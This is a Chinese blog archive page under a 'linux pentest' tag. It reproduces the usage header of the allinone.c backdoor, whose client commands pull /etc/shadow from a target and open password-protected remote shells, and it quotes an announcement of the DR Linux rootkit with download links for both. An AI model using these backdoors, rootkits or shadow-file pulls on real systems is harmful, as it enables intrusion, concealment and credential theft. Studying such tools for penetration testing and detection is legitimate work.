存档

文章标签 ‘linux pentest’

Linux提权后获取敏感信息的方法与途径

2013年10月15日 评论已被关闭

原文在 http://www.91ri.org/7459.html

阅读全文…

linux ssh隧道后门及检测

2010年12月1日 4 条评论

刚才和两位英雄在群里讨论了下,我总结一下转过来,和大家分享。

阅读全文…

allinone.c for HUC (2002.1)

2010年4月14日 2 条评论

“由于漏报、误报及检查成本的问题,不管是应用层的还是内核层的linux后门都非常难快速发现”,这是一个让人比较郁闷的实事;最近在研究linux后门的特征,不得不感叹一下:“lion作为红客联盟的灵魂人物,在2002年的时候对linux渗透这块的研究已经非常超前了,绝对算的上国内linux渗透界的开山鼻祖之一,看看这allinone.c的功能,完全为pentester度身定制,即使放在现在也是linux渗透利器。”

/************************************************************************
* allinone.c for HUC (2002.1)
*
* allinone.c is
* a Http server,
* a sockets transmit server,
* a shell backdoor,
* a icmp backdoor,
* a bind shell backdoor,
* a like http shell,
* it can translate file from remote host,
* it can give you a socks5 proxy,
* it can use for to attack, jumps the extension, Visits other machines.
* it can give you a root shell.:)
*
* Usage:
* compile:
* gcc -o allinone allinone.c -lpthread
* run on target:
* ./allinone
*
* 1.httpd server
* Client:
* http://target:8008/givemefile/etc/passwd
* lynx -dump http://target:8008/givemefile/etc/shadow > shadow
* or wget http://target:8008/givemefile/etc/shadow
*
* 2.icmp backdoor
* Client:
* ping -l 101 target (on windows)
* ping -s 101 -c 4 target (on linux)
* nc target 8080
* kissme:)   –> your password
*
* 3.shell backdoor
* Client:
* nc target 8008
* kissme:)   –> your password
*
* 4.bind a root shell on your port
* Client:
* http://target:8008/bindport:9999
* nc target 9999
* kissme:)   –> your password  
*
* 5.sockets transmit
* Client:
* http://target:8008/socks/:local listen port::you want to tran ip:::you want to tran port
* http://target:8008/socks/:1080::192.168.0.1:::21
* nc target 1080
*
* 6.http shell
* Client:
* http://target:8008/givemeshell:ls -al (no pipe)
*
* ps:
* All bind shell have a passwd, default is: kissme:)
* All bind shell will close, if Two minutes do not have the connection.
* All bind shell only can use one time until reactivates. 
*
*
* Code by lion, e-mail: lion@cnhonker.net
* Welcome to HUC Website, Http://www.cnhonker.com
*
* Test on redhat 6.1/6.2/7.0/7.1/7.2 (maybe others)
* Thx bkbll’s Transmit code, and thx Neil,con,iceblood for test.
*
************************************************************************/

http://packetstormsecurity.org/UNIX/penetration/rootkits/allinone.c

DR Linux 2.6 rootkit released

2008年9月8日 评论已被关闭

不好检测的LINUX RK。

o Hide processes
o Hide network sockets
o Hide files
o Get a remote MOSDEF Node (via hidden userland-backdoor)

The major benefit of the DR rootkit is that all this happens
transparently to the end user. The children of a hidden process are also
automatically hidden. The sockets a hidden process creates are also
hidden. But if you are a hidden process, you can see hidden resources.
This makes the DR rootkit nicely manageable.

DR loads via insmod – we’ve tested the rootkit on a number of Linux
distributions including CentOS and Ubuntu.

The CANVAS support and backdoor logic were written by Daniel Palacio
during his Immunity summer internship. He provided both the kernel hooks
and the userland backdoor to the project.

The rootkit engine (DR.c) was written by Bas Alberts and consists of a
debug register based hooking engine that does not modify the IDT or
syscall table at all. It was written as a reference implementation for
people wanting to experiment with such a rootkit technology, and was
designed to be able to integrate easily into existing syscall hook based
rootkits.

It has known limitations and considerations which you can read about in
the attached README.

You can find the source to the DR rootkit at:

URL: http://www.immunityinc.com/downloads/linux_rootkit_source.tbz2
MD5SUM: 1256523fa8a87949c5e588c981108ee8